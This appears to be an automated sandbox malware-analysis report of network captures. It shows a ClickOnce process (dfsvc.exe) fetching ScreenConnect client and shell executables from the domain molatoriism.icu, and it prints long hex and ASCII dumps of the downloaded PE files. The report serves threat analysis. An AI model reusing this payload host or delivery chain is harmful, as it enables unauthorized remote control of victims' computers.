                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 78 48 36 63 41 56 49 38 55 78 62 6e 72 4a 71 48 58 4d 77 38 58 52 4f 30 46 63 55 4e 51 78 58 41 39 70 49 52 57 72 43 6e 4b 41 6a 74 6a 7a 6d 6b 4c 6d 4d 2b 68 42 2f 6f 4f 53 2f 56 58 41 41 75 75 73 69 42 79 70 37 6d 2b 6c 6f 77 2f 5a 47 68 2b 74 66 43 73 42 4b 30 2b 6c 76 51 2f 38 52 6d 61 30 43 70 53 7a 76 76 76 2b 4b 66 35 6f 39 51 64 64 5a 4f 2f 6b 33 7a 71 4e 58 44 72 33 6c 64 35 45 32 75 79 48 68 68 59 56 73 75 30 6c 52 37 6c 44 43 57 6f 61 31 4a 52 52 61 56 63 4b 30 46 54 4d 58 2f 6e 30 39 75 55 31 39 69 48 33 51 66 42 52 65 4c 45 67 4d 75 4a 6a 65 48 72 61 44 53 39 6b 63 6f 53 6d 42 5a 30 42 5a 78 6c 4d 4c 79 4b 55 73 69 68 76 72 65 74 76 63 35 4b 56 78 79 4e 47 32 56 34 4d 6c 64 4b 52 43 76 59 39 76 46 76 50 35 77 31 6b 36 50 47 46 50 42 6a 34 33
                                                                                                                                                                              Data Ascii: xH6cAVI8UxbnrJqHXMw8XRO0FcUNQxXA9pIRWrCnKAjtjzmkLmM+hB/oOS/VXAAuusiByp7m+low/ZGh+tfCsBK0+lvQ/8Rma0CpSzvvv+Kf5o9QddZO/k3zqNXDr3ld5E2uyHhhYVsu0lR7lDCWoa1JRRaVcK0FTMX/n09uU19iH3QfBReLEgMuJjeHraDS9kcoSmBZ0BZxlMLyKUsihvretvc5KVxyNG2V4MldKRCvY9vFvP5w1k6PGFPBj43
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 6d 70 65 67 3a 6d 70 65 67 32 31 3a 32 30 30 33 3a 30 31 2d 52 45 4c 2d 52 2d 4e 53 22 20 78 6d 6c 6e 73 3a 61 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 70 6b 69 2f 32 30 30 35 2f 41 75 74 68 65 6e 74 69 63 6f 64 65 22 3e 3c 72 3a 67 72 61 6e 74 3e 3c 61 73 3a 4d 61 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 48 61 73 68 3d 22 38 62 31 32 63 31 65 34 38 38 32 34 65 62 31 63 30 33 63 37 32 31 61 64 35 30 65 32 37 39 64 31 64 36 30 32 62 63 39 35 22 20 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 22 20 55 72 6c 3d 22 22 3e 3c 61 73 3a 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65
                                                                                                                                                                              Data Ascii: mpeg:mpeg21:2003:01-REL-R-NS" xmlns:as="http://schemas.microsoft.com/windows/pki/2005/Authenticode"><r:grant><as:ManifestInformation Hash="8b12c1e48824eb1c03c721ad50e279d1d602bc95" Description="" Url=""><as:assemblyIdentity name="ScreenConnect.WindowsClie
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 4a 67 4c 30 45 4c 2f 4c 6b 6e 72 74 6c 4f 41 36 36 57 4e 61 76 31 65 58 65 5a 43 76 64 6b 6f 4f 34 43 73 43 41 73 79 51 61 59 46 74 7a 77 79 65 56 4e 48 64 48 53 36 38 47 4b 41 74 44 65 6d 49 36 30 38 69 70 66 71 37 57 63 4f 43 51 4b 46 44 44 57 6a 44 51 43 77 62 4a 6a 77 33 62 6f 66 79 41 53 4e 70 45 46 55 74 66 73 46 68 66 4e 49 45 45 70 55 32 46 53 71 66 51 75 49 39 7a 7a 77 33 2f 31 66 7a 65 36 4e 79 71 59 69 47 58 78 74 75 6a 46 52 38 38 49 31 72 70 4e 37 5a 51 75 48 55 4d 52 30 31 6e 4f 44 57 59 58 70 47 43 65 4f 35 65 74 36 36 45 43 73 73 69 4d 64 76 6d 31 44 42 6d 4a 49 77 64 61 35 36 63 69 5a 6f 37 6c 58 52 33 4a 6a 2b 38 41 67 53 59 61 75 70 35 33 57 62 7a 62 71 31 4b 41 6a 78 71 76 44 6d 37 59 77 75 35 47 43 4b 77 41 70 36 6a 49 73 54 44 74 4b
                                                                                                                                                                              Data Ascii: JgL0EL/LknrtlOA66WNav1eXeZCvdkoO4CsCAsyQaYFtzwyeVNHdHS68GKAtDemI608ipfq7WcOCQKFDDWjDQCwbJjw3bofyASNpEFUtfsFhfNIEEpU2FSqfQuI9zzw3/1fze6NyqYiGXxtujFR88I1rpN7ZQuHUMR01nODWYXpGCeO5et66ECssiMdvm1DBmJIwda56ciZo7lXR3Jj+8AgSYaup53Wbzbq1KAjxqvDm7Ywu5GCKwAp6jIsTDtK


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.549717172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:28 UTC99OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:28 UTC792INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEIOsoEGMfZebSqRBXPIKMhYuwF9uuUbppWz%2FGUgR7wKzxzBabn%2FnMbMcasTsYQiPL6qM%2FuLWrTx0G1MwXraS6Buj8zipP704Lq8WT12J0ePF3nOTiEHgevaNuPAvLrdB2c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7115a782cc7-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=714&delivery_rate=1693567&cwnd=251&unsent_bytes=0&cid=ad774a4b662f69d8&ts=349&x=0"
                                                                                                                                                                              2024-11-07 17:04:28 UTC577INData Raw: 37 64 33 64 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00
                                                                                                                                                                              Data Ascii: 7d3dMZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 00 00 d0 00 00 00 68 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 12 00 00 00 40 01 00 00 0a 00 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 04 00 00 00 60 01 00 00 06 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 0f 00 00 00 70 01 00 00 10 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: h@@.data@,@.rsrcX`6@@.relocp<@B
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: c1 02 66 85 c0 75 f5 2b ca 8d 85 e0 fd ff ff d1 f9 68 30 1f 41 00 8d 04 48 50 ff d6 6a 01 6a 00 6a 0c ff 15 60 d1 40 00 6a 04 89 85 d4 fb ff ff e8 49 0b 00 00 8b 35 64 d1 40 00 83 c4 04 89 85 d0 fb ff ff c7 00 00 00 00 00 33 c0 66 89 85 a0 fb ff ff 8d 85 a0 fb ff ff 50 ff d6 85 c0 0f 88 d5 02 00 00 b8 08 00 00 00 66 89 85 a0 fb ff ff 8d 85 e0 fd ff ff 50 ff d7 89 85 a8 fb ff ff 85 c0 0f 84 b8 02 00 00 8d 85 a0 fb ff ff 50 ff b5 d0 fb ff ff ff b5 d4 fb ff ff ff 15 5c d1 40 00 8d 85 a0 fb ff ff 50 ff d6 8b 35 50 d1 40 00 8d 85 80 fb ff ff 0f 57 c0 50 0f 11 85 80 fb ff ff ff d6 8b 85 c4 fb ff ff 0f 57 c0 89 85 d0 fb ff ff 8d 85 a0 fb ff ff 50 0f 11 85 a0 fb ff ff ff d6 c6 45 fc 0a 0f 10 85 a0 fb ff ff 68 3c 1f 41 00 0f 11 85 70 fb ff ff ff d7 8b f0 89 b5 94
                                                                                                                                                                              Data Ascii: fu+h0AHPjjj`@jI5d@3fPfPP\@P5P@WPWPEh<Ap
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: d1 40 00 89 85 d8 fd ff ff 85 c0 75 08 85 f6 0f 85 d3 00 00 00 8d 85 d0 fd ff ff 50 ff b5 a0 fd ff ff ff b5 a4 fd ff ff ff 15 5c d1 40 00 8b f0 8d 85 d0 fd ff ff 50 ff 15 64 d1 40 00 85 f6 78 45 8d 85 90 fd ff ff 0f 57 c0 50 0f 11 85 90 fd ff ff ff 15 50 d1 40 00 8b 95 a4 fd ff ff 8d 85 90 fd ff ff 50 b9 8c 1f 41 00 c7 45 fc 00 00 00 00 e8 8d f7 ff ff 83 c4 04 8d 85 90 fd ff ff 50 ff 15 64 d1 40 00 8d 85 a8 fd ff ff c7 85 ac fd ff ff 01 00 00 00 50 57 c7 85 b0 fd ff ff 00 00 00 00 ff 15 14 d0 40 00 8b 3d 38 d0 40 00 33 f6 0f 1f 00 ff b4 b5 c4 fd ff ff ff d7 46 83 fe 03 72 f1 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d ec 33 cd e8 ed 02 00 00 8b e5 5d 8b e3 5b c2 08 00 50 e8 5b f6 ff ff b8 0a 00 00 00 c7 85 d8 fd ff ff 0e 00 07 80 68 0e 00 07 80 66 89 85
                                                                                                                                                                              Data Ascii: @uP\@Pd@xEWPP@PAEPd@PW@=8@3FrMdY_^M3][P[hf
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 59 85 c0 74 27 83 78 24 00 7c 21 c7 45 fc fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec e8 f3 05 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 78 48 41 00 87 01 5d c3 55 8b ec 80 3d 7c 48 41 00 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 23 40 00 00 ff 75 08 e8 5f 17 00 00 59 59 b0 01 5d c3 55 8b ec 83 3d 80 48 41 00 ff ff 75 08 75 07 e8 6a 3e 00 00 eb 0b 68 80 48 41 00 e8 ce 3e 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 c8 ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 5d e9 e9 07 00 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 d2 40 00 74 0a 6a 0c 56 e8 ff 07 00 00 59 59 8b c6 5e 5d c2 04 00 56 6a 02 e8 b7 3f 00
                                                                                                                                                                              Data Ascii: Yt'x$|!EE38eE2MdY_^[Ut}u3xHA]U=|HAt}uu#@u_YY]U=HAuuj>hHA>YY#E]UuYH]U]UEVx@tjVYY^]Vj?
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d b8 4b 41 00 eb 03 8b 5d f0 a1 0c 40 41 00 83 c8 02 c7 05 b4 4b 41 00 01 00 00 00 a3 0c 40 41 00 f7 c1 00 00 10 00 0f 84 93 00 00 00 83 c8 04 c7 05 b4 4b 41 00 02 00 00 00 a3 0c 40 41 00 f7 c1 00 00 00 08 74 79 f7 c1 00 00 00 10 74 71 33 c9 0f 01 d0 89 45 ec 89 55 f0 8b 45 ec 8b 4d f0 6a 06 5e 23 c6 3b c6 75 57 a1 0c 40 41 00 83 c8 08 c7 05 b4 4b 41 00 03 00 00 00 a3 0c 40 41 00 f6 c3 20 74 3b 83 c8 20 c7 05 b4 4b 41 00 05 00 00 00 a3 0c 40 41 00 b8 00 00 03 d0 23 d8 3b d8 75 1e 8b 45 ec ba e0 00 00 00 8b 4d f0 23 c2 3b c2 75 0d 83 0d 0c 40 41 00 40 89 35 b4 4b 41 00 5f 5e 5b 33 c0 c9 c3 33 c0 40 c3 33 c0 39 05 78 52 41 00 0f 95 c0 c3 55 8b ec 81 ec 24 03 00 00 53 6a 17
                                                                                                                                                                              Data Ascii: sKMS]t=KA]@AKA@AKA@Atytq3EUEMj^#;uW@AKA@A t; KA@A#;uEM#;u@A@5KA_^[33@39xRAU$Sj
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 61 04 00 8b c1 83 61 08 00 c7 41 04 cc d2 40 00 c7 01 c4 d2 40 00 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 88 d2 40 00 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 e8 0e 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 88 d2 40 00 50 e8 33 0f 00 00 59 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 88 d2 40 00 50 e8 1c 0f 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 c4 fd ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 e8 3d ff ff ff 68 3c 29 41 00 8d 45 f4 50 e8 07 0f 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 53 ff ff ff 68 90 29 41 00 8d 45 f4 50 e8 ea 0e 00 00 cc 8b 41 04 85 c0 75 05 b8 90 d2 40 00 c3 55 8b ec 51 8b 45 18 8b 4d 1c 53 56 8b 58 10 57 8b 78 0c 8b d7 89 55 fc 8b f2 85 c9 78 2d 6b c2 14 83 c3 08 03 c3 8b 5d 10 83 fa ff 74 3c 83 e8 14 4a 39 58 fc 7d 04
                                                                                                                                                                              Data Ascii: aaA@@UVF@ `PEPYY^]A@P3YUVF@PEYtjVYY^]UM=h<)AEPUMSh)AEPAu@UQEMSVXWxUx-k]t<J9X}
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 19 74 0f 81 7e 14 22 05 93 19 74 06 5f 5e 33 c0 5d c3 e8 bc 0a 00 00 89 70 10 8b 77 04 e8 b1 0a 00 00 89 70 14 e8 47 33 00 00 cc 55 8b ec e8 a0 0a 00 00 8b 40 24 85 c0 74 0e 8b 4d 08 39 08 74 0c 8b 40 04 85 c0 75 f5 33 c0 40 5d c3 33 c0 5d c3 55 8b ec 8b 4d 0c 8b 55 08 56 8b 01 8b 71 04 03 c2 85 f6 78 0d 8b 49 08 8b 14 16 8b 0c 0a 03 ce 03 c1 5e 5d c3 55 8b ec 56 8b 75 08 57 8b 3e 81 3f 52 43 43 e0 74 12 81 3f 4d 4f 43 e0 74 0a 81 3f 63 73 6d e0 74 1b eb 13 e8 34 0a 00 00 83 78 18 00 7e 08 e8 29 0a 00 00 ff 48 18 5f 33 c0 5e 5d c3 e8 1b 0a 00 00 89 78 10 8b 76 04 e8 10 0a 00 00 89 70 14 e8 a6 32 00 00 cc e8 02 0a 00 00 83 c0 10 c3 e8 f9 09 00 00 83 c0 14 c3 cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 94 02 00 00
                                                                                                                                                                              Data Ascii: t~"t_^3]pwpG3U@$tM9t@u3@]3]UMUVqxI^]UVuW>?RCCt?MOCt?csmt4x~)H_3^]xvp2WVt$L$|$;v;
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 5f 8b d1 c1 ea 05 85 d2 74 21 8d 9b 00 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 8d 76 20 8d 7f 20 4a 75 e5 83 e1 1f 74 30 8b c1 c1 e9 02 74 0f 8b 16 89 17 83 c7 04 83 c6 04 83 e9 01 75 f1 8b c8 83 e1 03 74 13 8a 06 88 07 46 47 49 75 f7 8d a4 24 00 00 00 00 8d 49 00 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 8b ff ba 10 00 00 00 2b d0 2b ca 51 8b c2 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 48 75 f3 59 e9 e9 fe ff ff cc cc cc cc cc
                                                                                                                                                                              Data Ascii: oV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJut_t!ooNOv Jut0tutFGIu$ID$^_$++QtFGIutvHuY
                                                                                                                                                                              2024-11-07 17:04:28 UTC1369INData Raw: 5b c9 c2 08 00 55 8b ec 8b 45 08 85 c0 74 0e 3d dc 4b 41 00 74 07 50 e8 53 14 00 00 59 5d c2 04 00 e8 09 00 00 00 85 c0 0f 84 e1 29 00 00 c3 83 3d 20 40 41 00 ff 75 03 33 c0 c3 53 57 ff 15 48 d0 40 00 ff 35 20 40 41 00 8b f8 e8 b5 11 00 00 8b d8 59 83 fb ff 74 17 85 db 75 59 6a ff ff 35 20 40 41 00 e8 d7 11 00 00 59 59 85 c0 75 04 33 db eb 42 56 6a 28 6a 01 e8 2f 2a 00 00 8b f0 59 59 85 f6 74 12 56 ff 35 20 40 41 00 e8 af 11 00 00 59 59 85 c0 75 12 33 db 53 ff 35 20 40 41 00 e8 9b 11 00 00 59 59 eb 04 8b de 33 f6 56 e8 bc 13 00 00 59 5e 57 ff 15 d8 d0 40 00 5f 8b c3 5b c3 68 08 39 40 00 e8 c4 10 00 00 a3 20 40 41 00 59 83 f8 ff 75 03 32 c0 c3 68 dc 4b 41 00 50 e8 5c 11 00 00 59 59 85 c0 75 07 e8 05 00 00 00 eb e5 b0 01 c3 a1 20 40 41 00 83 f8 ff 74 0e 50
                                                                                                                                                                              Data Ascii: [UEt=KAtPSY])= @Au3SWH@5 @AYtuYj5 @AYYu3BVj(j/*YYtV5 @AYYu3S5 @AYY3VY^W@_[h9@ @AYu2hKAP\YYu @AtP


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.549721172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:30 UTC107OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:30 UTC796INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:30 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFRjwY7qv%2Fbvg%2Bmqt1iRl2Ccp6A0E2OdyxjqbzZ6ByHLo67zbOQ3hPXvW7MvpaD033WQwxgr8V4nWTU%2Fvj%2BKe3s7kNtWazBWa24ImJ2WGCuUeNeypM%2BAa6bp1DFc9AlyKUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee71cd90c6c4a-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=722&delivery_rate=2661764&cwnd=251&unsent_bytes=0&cid=9b09ff5d4c34468e&ts=316&x=0"
                                                                                                                                                                              2024-11-07 17:04:30 UTC573INData Raw: 37 64 34 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 7d41MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 11 00 00 0a 2a 5e 02 28 11 00 00 0a 02 17 8d 61 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 03 00 00 04 2a 00 00 00 13 30 04 00 8e 00 00 00 00 00 00 00 28 12 00 00 0a 28 13 00 00 0a 28 14 00 00 0a 28 15 00 00 0a 72 01 00 00 70 28 16 00 00 0a 6f 17 00 00 0a 28 18 00 00 0a 72 1d 00 00 70 1f 0b 7e 19 00 00 0a 28 1a 00 00 0a 28 18 00 00 0a 72 39 00 00 70 1f 16 7e 19 00 00 0a 28 1a 00 00 0a 28 18 00 00 0a 1f 67 7e 29 00 00 04 14 19 28 1b 00 00 0a 72 59 00 00 70 18 28 1c 00 00 0a 26 28 1d 00 00 0a 16 28 1e 00 00 0a 73 1f 00 00 0a 28 20 00 00 0a 73 07 00 00 06 28 21
                                                                                                                                                                              Data Ascii: (*^(a%}*:(}*:(}*:(}*0((((rp(o(rp~((r9p~((g~)(rYp(&((s( s(!
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 73 6a 00 00 0a 28 04 00 00 2b 6f 6c 00 00 0a 26 11 0a 17 58 13 0a 11 0a 11 09 8e 69 3f 19 ff ff ff 28 6d 00 00 0a 6f 6e 00 00 0a 13 0e 2b 11 11 0e 6f 6f 00 00 0a 13 0f 02 11 0f 28 0c 00 00 06 11 0e 6f 70 00 00 0a 2d e6 de 0c 11 0e 2c 07 11 0e 6f 5b 00 00 0a dc de 10 26 02 16 28 24 00 00 0a 02 28 71 00 00 0a de 00 2a 00 00 41 4c 00 00 02 00 00 00 a6 01 00 00 43 00 00 00 e9 01 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a1 03 00 00 1e 00 00 00 bf 03 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 03 00 00 cd 03 00 00 10 00 00 00 21 00 00 01 1b 30 05 00 28 03 00 00 02 00 00 11 03 28 72 00 00 0a 7e 0a 00 00 04 40 7c 01 00 00 72 70 02 00 70 19 8d 14 00 00 01 25 16 72 8a 02 00 70 a2 25 17 03 28 73 00 00 0a 28 74 00 00 0a 8c 23 00 00 01 a2 25 18 03 28 75
                                                                                                                                                                              Data Ascii: sj(+ol&Xi?(mon+oo(op-,o[&($(q*ALC!0((r~@|rpp%rp%(s(t#%(u
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 06 73 93 00 00 0a 28 10 00 00 2b 7d 3b 00 00 04 73 48 00 00 06 25 03 7e 17 00 00 04 28 6e 00 00 06 25 2d 22 26 09 7b 3b 00 00 04 25 2d 04 26 14 2b 05 6f 95 00 00 0a 25 2d 0c 26 18 7e 17 00 00 04 28 70 00 00 06 6f 62 00 00 0a 25 17 6f 2e 00 00 06 25 17 6f 25 00 00 06 25 03 6f 3f 00 00 06 25 06 6f 45 00 00 06 25 08 7b 38 00 00 04 6f 43 00 00 06 25 09 7b 3b 00 00 04 6f 41 00 00 06 13 04 09 7b 3b 00 00 04 2d 14 02 28 0e 00 00 06 6f 5f 00 00 0a 11 04 6f 6c 00 00 0a 26 2a 09 7b 3b 00 00 04 16 6f 96 00 00 0a 02 28 0e 00 00 06 6f 5f 00 00 0a 02 28 0e 00 00 06 6f 5f 00 00 0a 28 11 00 00 2b 09 fe 06 83 00 00 06 73 97 00 00 0a 15 28 12 00 00 2b 17 58 11 04 6f 99 00 00 0a 2a 00 00 00 13 30 04 00 94 00 00 00 04 00 00 11 73 84 00 00 06 0a 06 03 7d 3c 00 00 04 06 02 28
                                                                                                                                                                              Data Ascii: s(+};sH%~(n%-"&{;%-&+o%-&~(pob%o.%o%%o?%oE%{8oC%{;oA{;-(o_ol&*{;o(o_(o_(+s(+Xo*0s}<(
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 00 00 0a 2d 07 7e 1e 00 00 04 2b 05 7e 1d 00 00 04 6f cb 00 00 0a 03 6f c5 00 00 0a 03 6f cc 00 00 0a 03 6f cd 00 00 0a 03 6f ce 00 00 0a 03 6f cf 00 00 0a 03 6f d0 00 00 0a 28 d1 00 00 0a 2a 4e 03 7e 22 00 00 04 6f d2 00 00 0a 02 03 28 d3 00 00 0a 2a 00 00 13 30 07 00 2a 01 00 00 0a 00 00 11 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 2c 31 06 6f 2b 00 00 06 2c 29 03 6f c5 00 00 0a 7e 1b 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 6f b8 00 00 0a 2c 29 03 6f c5 00 00 0a 7e 1c 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 39 a1 00 00 00 06 6f 2d 00 00 06 39 96 00 00 00 03 6f c5 00 00 0a 7e 2f 00 00
                                                                                                                                                                              Data Ascii: -~+~ooooooo(*N~"o(*0*ou,1o+,)o~0oosooo,)o~0oosoou9o-9o~/
